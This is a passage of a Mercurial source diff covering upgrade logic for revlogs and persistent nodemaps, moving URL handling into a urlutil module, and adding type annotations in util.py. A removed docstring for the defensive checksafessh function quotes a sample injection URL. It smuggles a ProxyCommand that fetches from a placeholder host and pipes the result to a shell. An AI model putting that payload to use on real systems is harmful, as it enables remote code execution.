+ elif rl_type & store.FILEFLAGS_MANIFESTLOG:
return UPGRADE_MANIFEST in revlogfilter
+ assert rl_type & store.FILEFLAGS_FILELOG
return UPGRADE_FILELOGS in revlogfilter
@@ -123,6 +128,7 @@
dstrepo,
tr,
old_revlog,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -130,11 +136,11 @@
):
""" returns the new revlog object created"""
newrl = None
- if matchrevlog(upgrade_op.revlogs_to_process, unencoded):
+ if matchrevlog(upgrade_op.revlogs_to_process, rl_type):
ui.note(
_(b'cloning %d revisions from %s\n') % (len(old_revlog), unencoded)
)
- newrl = _revlogfrompath(dstrepo, unencoded)
+ newrl = _revlogfrompath(dstrepo, rl_type, unencoded)
old_revlog.clone(
tr,
newrl,
@@ -146,9 +152,9 @@
else:
msg = _(b'blindly copying %s containing %i revisions\n')
ui.note(msg % (unencoded, len(old_revlog)))
- _copyrevlog(tr, dstrepo, old_revlog, unencoded)
+ _copyrevlog(tr, dstrepo, old_revlog, rl_type, unencoded)
- newrl = _revlogfrompath(dstrepo, unencoded)
+ newrl = _revlogfrompath(dstrepo, rl_type, unencoded)
return newrl
@@ -189,11 +195,11 @@
# Perform a pass to collect metadata. This validates we can open all
# source files and allows a unified progress bar to be displayed.
- for unencoded, encoded, size in alldatafiles:
- if not unencoded.endswith(b'.i'):
+ for rl_type, unencoded, encoded, size in alldatafiles:
+ if not rl_type & store.FILEFLAGS_REVLOG_MAIN:
continue
- rl = _revlogfrompath(srcrepo, unencoded)
+ rl = _revlogfrompath(srcrepo, rl_type, unencoded)
info = rl.storageinfo(
exclusivefiles=True,
@@ -210,19 +216,19 @@
srcrawsize += rawsize
# This is for the separate progress bars.
- if isinstance(rl, changelog.changelog):
- changelogs[unencoded] = rl
+ if rl_type & store.FILEFLAGS_CHANGELOG:
+ changelogs[unencoded] = (rl_type, rl)
crevcount += len(rl)
csrcsize += datasize
crawsize += rawsize
- elif isinstance(rl, manifest.manifestrevlog):
- manifests[unencoded] = rl
+ elif rl_type & store.FILEFLAGS_MANIFESTLOG:
+ manifests[unencoded] = (rl_type, rl)
mcount += 1
mrevcount += len(rl)
msrcsize += datasize
mrawsize += rawsize
- elif isinstance(rl, filelog.filelog):
- filelogs[unencoded] = rl
+ elif rl_type & store.FILEFLAGS_FILELOG:
+ filelogs[unencoded] = (rl_type, rl)
fcount += 1
frevcount += len(rl)
fsrcsize += datasize
@@ -267,12 +273,13 @@
)
)
progress = srcrepo.ui.makeprogress(_(b'file revisions'), total=frevcount)
- for unencoded, oldrl in sorted(filelogs.items()):
+ for unencoded, (rl_type, oldrl) in sorted(filelogs.items()):
newrl = _perform_clone(
ui,
dstrepo,
tr,
oldrl,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -306,12 +313,13 @@
progress = srcrepo.ui.makeprogress(
_(b'manifest revisions'), total=mrevcount
)
- for unencoded, oldrl in sorted(manifests.items()):
+ for unencoded, (rl_type, oldrl) in sorted(manifests.items()):
newrl = _perform_clone(
ui,
dstrepo,
tr,
oldrl,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -344,12 +352,13 @@
progress = srcrepo.ui.makeprogress(
_(b'changelog revisions'), total=crevcount
)
- for unencoded, oldrl in sorted(changelogs.items()):
+ for unencoded, (rl_type, oldrl) in sorted(changelogs.items()):
newrl = _perform_clone(
ui,
dstrepo,
tr,
oldrl,
+ rl_type,
unencoded,
upgrade_op,
sidedatacompanion,
@@ -381,7 +390,7 @@
are cloned"""
for path, kind, st in sorted(srcrepo.store.vfs.readdir(b'', stat=True)):
# don't copy revlogs as they are already cloned
- if path.endswith((b'.i', b'.d', b'.n', b'.nd')):
+ if store.revlog_type(path) is not None:
continue
# Skip transaction related files.
if path.startswith(b'undo'):
@@ -412,7 +421,10 @@
"""
# TODO: don't blindly rename everything in store
# There can be upgrades where store is not touched at all
- util.rename(currentrepo.spath, backupvfs.join(b'store'))
+ if upgrade_op.backup_store:
+ util.rename(currentrepo.spath, backupvfs.join(b'store'))
+ else:
+ currentrepo.vfs.rmtree(b'store', forcibly=True)
util.rename(upgradedrepo.spath, currentrepo.spath)
@@ -436,6 +448,8 @@
"""
assert srcrepo.currentwlock()
assert dstrepo.currentwlock()
+ backuppath = None
+ backupvfs = None
ui.status(
_(
@@ -444,79 +458,136 @@
)
)
- with dstrepo.transaction(b'upgrade') as tr:
- _clonerevlogs(
- ui,
- srcrepo,
- dstrepo,
- tr,
- upgrade_op,
+ if upgrade_op.requirements_only:
+ ui.status(_(b'upgrading repository requirements\n'))
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ # if there is only one action and that is persistent nodemap upgrade
+ # directly write the nodemap file and update requirements instead of going
+ # through the whole cloning process
+ elif (
+ len(upgrade_op.upgrade_actions) == 1
+ and b'persistent-nodemap' in upgrade_op._upgrade_actions_names
+ and not upgrade_op.removed_actions
+ ):
+ ui.status(
+ _(b'upgrading repository to use persistent nodemap feature\n')
+ )
+ with srcrepo.transaction(b'upgrade') as tr:
+ unfi = srcrepo.unfiltered()
+ cl = unfi.changelog
+ nodemap.persist_nodemap(tr, cl, force=True)
+ # we want to directly operate on the underlying revlog to force
+ # create a nodemap file. This is fine since this is upgrade code
+ # and it heavily relies on repository being revlog based
+ # hence accessing private attributes can be justified
+ nodemap.persist_nodemap(
+ tr, unfi.manifestlog._rootstore._revlog, force=True
+ )
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ elif (
+ len(upgrade_op.removed_actions) == 1
+ and [
+ x
+ for x in upgrade_op.removed_actions
+ if x.name == b'persistent-nodemap'
+ ]
+ and not upgrade_op.upgrade_actions
+ ):
+ ui.status(
+ _(b'downgrading repository to not use persistent nodemap feature\n')
+ )
+ with srcrepo.transaction(b'upgrade') as tr:
+ unfi = srcrepo.unfiltered()
+ cl = unfi.changelog
+ nodemap.delete_nodemap(tr, srcrepo, cl)
+ # check comment 20 lines above for accessing private attributes
+ nodemap.delete_nodemap(
+ tr, srcrepo, unfi.manifestlog._rootstore._revlog
+ )
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ else:
+ with dstrepo.transaction(b'upgrade') as tr:
+ _clonerevlogs(
+ ui,
+ srcrepo,
+ dstrepo,
+ tr,
+ upgrade_op,
+ )
+
+ # Now copy other files in the store directory.
+ for p in _files_to_copy_post_revlog_clone(srcrepo):
+ srcrepo.ui.status(_(b'copying %s\n') % p)
+ src = srcrepo.store.rawvfs.join(p)
+ dst = dstrepo.store.rawvfs.join(p)
+ util.copyfile(src, dst, copystat=True)
+
+ finishdatamigration(ui, srcrepo, dstrepo, requirements)
+
+ ui.status(_(b'data fully upgraded in a temporary repository\n'))
+
+ if upgrade_op.backup_store:
+ backuppath = pycompat.mkdtemp(
+ prefix=b'upgradebackup.', dir=srcrepo.path
+ )
+ backupvfs = vfsmod.vfs(backuppath)
+
+ # Make a backup of requires file first, as it is the first to be modified.
+ util.copyfile(
+ srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires')
+ )
+
+ # We install an arbitrary requirement that clients must not support
+ # as a mechanism to lock out new clients during the data swap. This is
+ # better than allowing a client to continue while the repository is in
+ # an inconsistent state.
+ ui.status(
+ _(
+ b'marking source repository as being upgraded; clients will be '
+ b'unable to read from repository\n'
+ )
+ )
+ scmutil.writereporequirements(
+ srcrepo, srcrepo.requirements | {b'upgradeinprogress'}
)
- # Now copy other files in the store directory.
- for p in _files_to_copy_post_revlog_clone(srcrepo):
- srcrepo.ui.status(_(b'copying %s\n') % p)
- src = srcrepo.store.rawvfs.join(p)
- dst = dstrepo.store.rawvfs.join(p)
- util.copyfile(src, dst, copystat=True)
-
- finishdatamigration(ui, srcrepo, dstrepo, requirements)
-
- ui.status(_(b'data fully upgraded in a temporary repository\n'))
-
- backuppath = pycompat.mkdtemp(prefix=b'upgradebackup.', dir=srcrepo.path)
- backupvfs = vfsmod.vfs(backuppath)
-
- # Make a backup of requires file first, as it is the first to be modified.
- util.copyfile(srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires'))
-
- # We install an arbitrary requirement that clients must not support
- # as a mechanism to lock out new clients during the data swap. This is
- # better than allowing a client to continue while the repository is in
- # an inconsistent state.
- ui.status(
- _(
- b'marking source repository as being upgraded; clients will be '
- b'unable to read from repository\n'
- )
- )
- scmutil.writereporequirements(
- srcrepo, srcrepo.requirements | {b'upgradeinprogress'}
- )
+ ui.status(_(b'starting in-place swap of repository data\n'))
+ if upgrade_op.backup_store:
+ ui.status(
+ _(b'replaced files will be backed up at %s\n') % backuppath
+ )
- ui.status(_(b'starting in-place swap of repository data\n'))
- ui.status(_(b'replaced files will be backed up at %s\n') % backuppath)
-
- # Now swap in the new store directory. Doing it as a rename should make
- # the operation nearly instantaneous and atomic (at least in well-behaved
- # environments).
- ui.status(_(b'replacing store...\n'))
- tstart = util.timer()
- _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op)
- elapsed = util.timer() - tstart
- ui.status(
- _(
- b'store replacement complete; repository was inconsistent for '
- b'%0.1fs\n'
+ # Now swap in the new store directory. Doing it as a rename should make
+ # the operation nearly instantaneous and atomic (at least in well-behaved
+ # environments).
+ ui.status(_(b'replacing store...\n'))
+ tstart = util.timer()
+ _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op)
+ elapsed = util.timer() - tstart
+ ui.status(
+ _(
+ b'store replacement complete; repository was inconsistent for '
+ b'%0.1fs\n'
+ )
+ % elapsed
)
- % elapsed
- )
- # We first write the requirements file. Any new requirements will lock
- # out legacy clients.
- ui.status(
- _(
- b'finalizing requirements file and making repository readable '
- b'again\n'
+ # We first write the requirements file. Any new requirements will lock
+ # out legacy clients.
+ ui.status(
+ _(
+ b'finalizing requirements file and making repository readable '
+ b'again\n'
+ )
)
- )
- scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
+ scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements)
- # The lock file from the old store won't be removed because nothing has a
- # reference to its new location. So clean it up manually. Alternatively, we
- # could update srcrepo.svfs and other variables to point to the new
- # location. This is simpler.
- assert backupvfs is not None # help pytype
- backupvfs.unlink(b'store/lock')
+ if upgrade_op.backup_store:
+ # The lock file from the old store won't be removed because nothing has a
+ # reference to its new location. So clean it up manually. Alternatively, we
+ # could update srcrepo.svfs and other variables to point to the new
+ # location. This is simpler.
+ assert backupvfs is not None # help pytype
+ backupvfs.unlink(b'store/lock')
return backuppath
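
The restructured body now picks one of four strategies up front; the
decision shape, reduced to a sketch over the attributes used above:

    def choose_strategy(upgrade_op):
        if upgrade_op.requirements_only:
            return 'rewrite-requirements-only'
        if (
            len(upgrade_op.upgrade_actions) == 1
            and b'persistent-nodemap' in upgrade_op._upgrade_actions_names
            and not upgrade_op.removed_actions
        ):
            return 'write-nodemap-in-place'
        if (
            len(upgrade_op.removed_actions) == 1
            and any(
                x.name == b'persistent-nodemap'
                for x in upgrade_op.removed_actions
            )
            and not upgrade_op.upgrade_actions
        ):
            return 'delete-nodemap-in-place'
        return 'full-clone-and-swap'
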
--- a/mercurial/url.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/url.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# url.py - HTTP handling for mercurial
#
-# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com>
# Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
@@ -26,7 +26,10 @@
urllibcompat,
util,
)
-from .utils import stringutil
+from .utils import (
+ stringutil,
+ urlutil,
+)
httplib = util.httplib
stringio = util.stringio
@@ -75,17 +78,17 @@
user, passwd = auth.get(b'username'), auth.get(b'password')
self.ui.debug(b"using auth.%s.* for authentication\n" % group)
if not user or not passwd:
- u = util.url(pycompat.bytesurl(authuri))
+ u = urlutil.url(pycompat.bytesurl(authuri))
u.query = None
if not self.ui.interactive():
raise error.Abort(
_(b'http authorization required for %s')
- % util.hidepassword(bytes(u))
+ % urlutil.hidepassword(bytes(u))
)
self.ui.write(
_(b"http authorization required for %s\n")
- % util.hidepassword(bytes(u))
+ % urlutil.hidepassword(bytes(u))
)
self.ui.write(_(b"realm: %s\n") % pycompat.bytesurl(realm))
if user:
@@ -128,7 +131,7 @@
proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:')
):
proxyurl = b'http://' + proxyurl + b'/'
- proxy = util.url(proxyurl)
+ proxy = urlutil.url(proxyurl)
if not proxy.user:
proxy.user = ui.config(b"http_proxy", b"user")
proxy.passwd = ui.config(b"http_proxy", b"passwd")
@@ -155,7 +158,9 @@
# expects them to be.
proxyurl = str(proxy)
proxies = {'http': proxyurl, 'https': proxyurl}
- ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy)))
+ ui.debug(
+ b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy))
+ )
else:
proxies = {}
@@ -219,7 +224,7 @@
new_tunnel = False
if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy
- u = util.url(pycompat.bytesurl(tunnel_host))
+ u = urlutil.url(pycompat.bytesurl(tunnel_host))
if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS
h.realhostport = b':'.join([u.host, (u.port or b'443')])
h.headers = req.headers.copy()
@@ -675,7 +680,7 @@
def open(ui, url_, data=None, sendaccept=True):
- u = util.url(url_)
+ u = urlutil.url(url_)
if u.scheme:
u.scheme = u.scheme.lower()
url_, authinfo = u.authinfo()
--- a/mercurial/util.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/util.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -28,7 +28,6 @@
import platform as pyplatform
import re as remod
import shutil
-import socket
import stat
import sys
import time
@@ -57,8 +56,18 @@
hashutil,
procutil,
stringutil,
+ urlutil,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Iterator,
+ List,
+ Optional,
+ Tuple,
+ )
+
+
base85 = policy.importmod('base85')
osutil = policy.importmod('osutil')
@@ -133,6 +142,7 @@
def setumask(val):
+ # type: (int) -> None
''' updates the umask. used by chg server '''
if pycompat.iswindows:
return
@@ -307,7 +317,7 @@
try:
- buffer = buffer
+ buffer = buffer # pytype: disable=name-error
except NameError:
def buffer(sliceable, offset=0, length=None):
@@ -1254,7 +1264,8 @@
"""call this before writes, return self or a copied new object"""
if getattr(self, '_copied', 0):
self._copied -= 1
- return self.__class__(self)
+ # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count]
+ return self.__class__(self) # pytype: disable=wrong-arg-count
return self
def copy(self):
@@ -1285,11 +1296,13 @@
if pycompat.ispypy:
# __setitem__() isn't called as of PyPy 5.8.0
- def update(self, src):
+ def update(self, src, **f):
if isinstance(src, dict):
src = pycompat.iteritems(src)
for k, v in src:
self[k] = v
+ for k in f:
+ self[k] = f[k]
def insert(self, position, key, value):
for (i, (k, v)) in enumerate(list(self.items())):
@@ -1395,8 +1408,8 @@
__slots__ = ('next', 'prev', 'key', 'value', 'cost')
def __init__(self):
- self.next = None
- self.prev = None
+ self.next = self
+ self.prev = self
self.key = _notset
self.value = None
@@ -1435,9 +1448,7 @@
def __init__(self, max, maxcost=0):
self._cache = {}
- self._head = head = _lrucachenode()
- head.prev = head
- head.next = head
+ self._head = _lrucachenode()
self._size = 1
self.capacity = max
self.totalcost = 0
@@ -1542,6 +1553,7 @@
"""
try:
node = self._cache[k]
+ assert node is not None # help pytype
return node.value
except KeyError:
if default is _notset:
@@ -1599,6 +1611,9 @@
# Walk the linked list backwards starting at tail node until we hit
# a non-empty node.
n = self._head.prev
+
+ assert n is not None # help pytype
+
while n.key is _notset:
n = n.prev
@@ -1833,6 +1848,7 @@
def pathto(root, n1, n2):
+ # type: (bytes, bytes, bytes) -> bytes
"""return the relative path from one place to another.
root should use os.sep to separate directories
n1 should use os.sep to separate directories
@@ -2017,6 +2033,7 @@
def checkwinfilename(path):
+ # type: (bytes) -> Optional[bytes]
r"""Check that the base-relative path is a valid filename on Windows.
Returns None if the path is ok, or a UI string describing the problem.
@@ -2111,6 +2128,7 @@
def readlock(pathname):
+ # type: (bytes) -> bytes
try:
return readlink(pathname)
except OSError as why:
@@ -2134,6 +2152,7 @@
def fscasesensitive(path):
+ # type: (bytes) -> bool
"""
Return true if the given path is on a case-sensitive filesystem
@@ -2170,10 +2189,11 @@
def _checkre2(self):
global _re2
global _re2_input
+
+ check_pattern = br'\[([^\[]+)\]'
+ check_input = b'[ui]'
try:
# check if match works, see issue3964
- check_pattern = br'\[([^\[]+)\]'
- check_input = b'[ui]'
_re2 = bool(re2.match(check_pattern, check_input))
except ImportError:
_re2 = False
@@ -2226,6 +2246,7 @@
def fspath(name, root):
+ # type: (bytes, bytes) -> bytes
"""Get name in the case stored in the filesystem
The name should be relative to root, and be normcase-ed for efficiency.
@@ -2270,6 +2291,7 @@
def checknlink(testfile):
+ # type: (bytes) -> bool
'''check whether hardlink count reporting works properly'''
# testfile may be open, so we need a separate file for checking to
@@ -2303,8 +2325,9 @@
def endswithsep(path):
+ # type: (bytes) -> bool
'''Check path ends with os.sep or os.altsep.'''
- return (
+ return bool( # help pytype
path.endswith(pycompat.ossep)
or pycompat.osaltsep
and path.endswith(pycompat.osaltsep)
@@ -2312,6 +2335,7 @@
def splitpath(path):
+ # type: (bytes) -> List[bytes]
"""Split path by os.sep.
Note that this function does not use os.altsep because this is
an alternative of simple "xxx.split(os.sep)".
@@ -2540,6 +2564,7 @@
def unlinkpath(f, ignoremissing=False, rmdir=True):
+ # type: (bytes, bool, bool) -> None
"""unlink and remove the directory if it is empty"""
if ignoremissing:
tryunlink(f)
@@ -2554,6 +2579,7 @@
def tryunlink(f):
+ # type: (bytes) -> None
"""Attempt to remove a file, ignoring ENOENT errors."""
try:
unlink(f)
@@ -2563,6 +2589,7 @@
def makedirs(name, mode=None, notindexed=False):
+ # type: (bytes, Optional[int], bool) -> None
"""recursive directory creation with parent mode inheritance
Newly created directories are marked as "not to be indexed by
@@ -2592,16 +2619,19 @@
def readfile(path):
+ # type: (bytes) -> bytes
with open(path, b'rb') as fp:
return fp.read()
def writefile(path, text):
+ # type: (bytes, bytes) -> None
with open(path, b'wb') as fp:
fp.write(text)
def appendfile(path, text):
+ # type: (bytes, bytes) -> None
with open(path, b'ab') as fp:
fp.write(text)
@@ -2763,6 +2793,7 @@
def processlinerange(fromline, toline):
+ # type: (int, int) -> Tuple[int, int]
"""Check that linerange <fromline>:<toline> makes sense and return a
0-based range.
@@ -2822,10 +2853,12 @@
def tolf(s):
+ # type: (bytes) -> bytes
return _eolre.sub(b'\n', s)
def tocrlf(s):
+ # type: (bytes) -> bytes
return _eolre.sub(b'\r\n', s)
@@ -2889,12 +2922,14 @@
def iterlines(iterator):
+ # type: (Iterator[bytes]) -> Iterator[bytes]
for chunk in iterator:
for line in chunk.splitlines():
yield line
def expandpath(path):
+ # type: (bytes) -> bytes
return os.path.expanduser(os.path.expandvars(path))
@@ -2924,396 +2959,52 @@
return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
-def getport(port):
- """Return the port for a given network service.
-
- If port is an integer, it's returned as is. If it's a string, it's
- looked up using socket.getservbyname(). If there's no matching
- service, error.Abort is raised.
- """
- try:
- return int(port)
- except ValueError:
- pass
-
- try:
- return socket.getservbyname(pycompat.sysstr(port))
- except socket.error:
- raise error.Abort(
- _(b"no port number associated with service '%s'") % port
- )
-
-
-class url(object):
- r"""Reliable URL parser.
-
- This parses URLs and provides attributes for the following
- components:
-
- <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
-
- Missing components are set to None. The only exception is
- fragment, which is set to '' if present but empty.
-
- If parsefragment is False, fragment is included in query. If
- parsequery is False, query is included in path. If both are
- False, both fragment and query are included in path.
-
- See http://www.ietf.org/rfc/rfc2396.txt for more information.
-
- Note that for backward compatibility reasons, bundle URLs do not
- take host names. That means 'bundle://../' has a path of '../'.
-
- Examples:
-
- >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
- <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
- >>> url(b'ssh://[::1]:2200//home/joe/repo')
- <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
- >>> url(b'file:///home/joe/repo')
- <url scheme: 'file', path: '/home/joe/repo'>
- >>> url(b'file:///c:/temp/foo/')
- <url scheme: 'file', path: 'c:/temp/foo/'>
- >>> url(b'bundle:foo')
- <url scheme: 'bundle', path: 'foo'>
- >>> url(b'bundle://../foo')
- <url scheme: 'bundle', path: '../foo'>
- >>> url(br'c:\foo\bar')
- <url path: 'c:\\foo\\bar'>
- >>> url(br'\\blah\blah\blah')
- <url path: '\\\\blah\\blah\\blah'>
- >>> url(br'\\blah\blah\blah#baz')
- <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
- >>> url(br'file:///C:\users\me')
- <url scheme: 'file', path: 'C:\\users\\me'>
-
- Authentication credentials:
-
- >>> url(b'ssh://joe:xyz@x/repo')
- <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
- >>> url(b'ssh://joe@x/repo')
- <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
-
- Query strings and fragments:
-
- >>> url(b'http://host/a?b#c')
- <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
- >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
- <url scheme: 'http', host: 'host', path: 'a?b#c'>
-
- Empty path:
-
- >>> url(b'')
- <url path: ''>
- >>> url(b'#a')
- <url path: '', fragment: 'a'>
- >>> url(b'http://host/')
- <url scheme: 'http', host: 'host', path: ''>
- >>> url(b'http://host/#a')
- <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
-
- Only scheme:
-
- >>> url(b'http:')
- <url scheme: 'http'>
- """
-
- _safechars = b"!~*'()+"
- _safepchars = b"/!~*'()+:\\"
- _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
-
- def __init__(self, path, parsequery=True, parsefragment=True):
- # We slowly chomp away at path until we have only the path left
- self.scheme = self.user = self.passwd = self.host = None
- self.port = self.path = self.query = self.fragment = None
- self._localpath = True
- self._hostport = b''
- self._origpath = path
-
- if parsefragment and b'#' in path:
- path, self.fragment = path.split(b'#', 1)
-
- # special case for Windows drive letters and UNC paths
- if hasdriveletter(path) or path.startswith(b'\\\\'):
- self.path = path
- return
-
- # For compatibility reasons, we can't handle bundle paths as
- # normal URLS
- if path.startswith(b'bundle:'):
- self.scheme = b'bundle'
- path = path[7:]
- if path.startswith(b'//'):
- path = path[2:]
- self.path = path
- return
-
- if self._matchscheme(path):
- parts = path.split(b':', 1)
- if parts[0]:
- self.scheme, path = parts
- self._localpath = False
-
- if not path:
- path = None
- if self._localpath:
- self.path = b''
- return
- else:
- if self._localpath:
- self.path = path
- return
-
- if parsequery and b'?' in path:
- path, self.query = path.split(b'?', 1)
- if not path:
- path = None
- if not self.query:
- self.query = None
-
- # // is required to specify a host/authority
- if path and path.startswith(b'//'):
- parts = path[2:].split(b'/', 1)
- if len(parts) > 1:
- self.host, path = parts
- else:
- self.host = parts[0]
- path = None
- if not self.host:
- self.host = None
- # path of file:///d is /d
- # path of file:///d:/ is d:/, not /d:/
- if path and not hasdriveletter(path):
- path = b'/' + path
-
- if self.host and b'@' in self.host:
- self.user, self.host = self.host.rsplit(b'@', 1)
- if b':' in self.user:
- self.user, self.passwd = self.user.split(b':', 1)
- if not self.host:
- self.host = None
-
- # Don't split on colons in IPv6 addresses without ports
- if (
- self.host
- and b':' in self.host
- and not (
- self.host.startswith(b'[') and self.host.endswith(b']')
- )
- ):
- self._hostport = self.host
- self.host, self.port = self.host.rsplit(b':', 1)
- if not self.host:
- self.host = None
-
- if (
- self.host
- and self.scheme == b'file'
- and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
- ):
- raise error.Abort(
- _(b'file:// URLs can only refer to localhost')
- )
-
- self.path = path
-
- # leave the query string escaped
- for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
- v = getattr(self, a)
- if v is not None:
- setattr(self, a, urlreq.unquote(v))
-
- @encoding.strmethod
- def __repr__(self):
- attrs = []
- for a in (
- b'scheme',
- b'user',
- b'passwd',
- b'host',
- b'port',
- b'path',
- b'query',
- b'fragment',
- ):
- v = getattr(self, a)
- if v is not None:
- attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
- return b'<url %s>' % b', '.join(attrs)
-
- def __bytes__(self):
- r"""Join the URL's components back into a URL string.
-
- Examples:
-
- >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
- 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
- 'http://user:pw@host:80/?foo=bar&baz=42'
- >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
- 'http://user:pw@host:80/?foo=bar%3dbaz'
- >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
- 'ssh://user:pw@[::1]:2200//home/joe#'
- >>> bytes(url(b'http://localhost:80//'))
- 'http://localhost:80//'
- >>> bytes(url(b'http://localhost:80/'))
- 'http://localhost:80/'
- >>> bytes(url(b'http://localhost:80'))
- 'http://localhost:80/'
- >>> bytes(url(b'bundle:foo'))
- 'bundle:foo'
- >>> bytes(url(b'bundle://../foo'))
- 'bundle:../foo'
- >>> bytes(url(b'path'))
- 'path'
- >>> bytes(url(b'file:///tmp/foo/bar'))
- 'file:///tmp/foo/bar'
- >>> bytes(url(b'file:///c:/tmp/foo/bar'))
- 'file:///c:/tmp/foo/bar'
- >>> print(url(br'bundle:foo\bar'))
- bundle:foo\bar
- >>> print(url(br'file:///D:\data\hg'))
- file:///D:\data\hg
- """
- if self._localpath:
- s = self.path
- if self.scheme == b'bundle':
- s = b'bundle:' + s
- if self.fragment:
- s += b'#' + self.fragment
- return s
-
- s = self.scheme + b':'
- if self.user or self.passwd or self.host:
- s += b'//'
- elif self.scheme and (
- not self.path
- or self.path.startswith(b'/')
- or hasdriveletter(self.path)
- ):
- s += b'//'
- if hasdriveletter(self.path):
- s += b'/'
- if self.user:
- s += urlreq.quote(self.user, safe=self._safechars)
- if self.passwd:
- s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
- if self.user or self.passwd:
- s += b'@'
- if self.host:
- if not (self.host.startswith(b'[') and self.host.endswith(b']')):
- s += urlreq.quote(self.host)
- else:
- s += self.host
- if self.port:
- s += b':' + urlreq.quote(self.port)
- if self.host:
- s += b'/'
- if self.path:
- # TODO: similar to the query string, we should not unescape the
- # path when we store it, the path might contain '%2f' = '/',
- # which we should *not* escape.
- s += urlreq.quote(self.path, safe=self._safepchars)
- if self.query:
- # we store the query in escaped form.
- s += b'?' + self.query
- if self.fragment is not None:
- s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
- return s
-
- __str__ = encoding.strmethod(__bytes__)
-
- def authinfo(self):
- user, passwd = self.user, self.passwd
- try:
- self.user, self.passwd = None, None
- s = bytes(self)
- finally:
- self.user, self.passwd = user, passwd
- if not self.user:
- return (s, None)
- # authinfo[1] is passed to urllib2 password manager, and its
- # URIs must not contain credentials. The host is passed in the
- # URIs list because Python < 2.4.3 uses only that to search for
- # a password.
- return (s, (None, (s, self.host), self.user, self.passwd or b''))
-
- def isabs(self):
- if self.scheme and self.scheme != b'file':
- return True # remote URL
- if hasdriveletter(self.path):
- return True # absolute for our purposes - can't be joined()
- if self.path.startswith(br'\\'):
- return True # Windows UNC path
- if self.path.startswith(b'/'):
- return True # POSIX-style
- return False
-
- def localpath(self):
- if self.scheme == b'file' or self.scheme == b'bundle':
- path = self.path or b'/'
- # For Windows, we need to promote hosts containing drive
- # letters to paths with drive letters.
- if hasdriveletter(self._hostport):
- path = self._hostport + b'/' + self.path
- elif (
- self.host is not None and self.path and not hasdriveletter(path)
- ):
- path = b'/' + path
- return path
- return self._origpath
-
- def islocal(self):
- '''whether localpath will return something that posixfile can open'''
- return (
- not self.scheme
- or self.scheme == b'file'
- or self.scheme == b'bundle'
- )
-
-
-def hasscheme(path):
- return bool(url(path).scheme)
-
-
-def hasdriveletter(path):
- return path and path[1:2] == b':' and path[0:1].isalpha()
-
-
-def urllocalpath(path):
- return url(path, parsequery=False, parsefragment=False).localpath()
-
-
-def checksafessh(path):
- """check if a path / url is a potentially unsafe ssh exploit (SEC)
-
- This is a sanity check for ssh urls. ssh will parse the first item as
- an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
- Let's prevent these potentially exploited urls entirely and warn the
- user.
-
- Raises an error.Abort when the url is unsafe.
- """
- path = urlreq.unquote(path)
- if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
- raise error.Abort(
- _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
- )
-
-
-def hidepassword(u):
- '''hide user credential in a url string'''
- u = url(u)
- if u.passwd:
- u.passwd = b'***'
- return bytes(u)
-
-
-def removeauth(u):
- '''remove all authentication information from a url string'''
- u = url(u)
- u.user = u.passwd = None
- return bytes(u)
+def getport(*args, **kwargs):
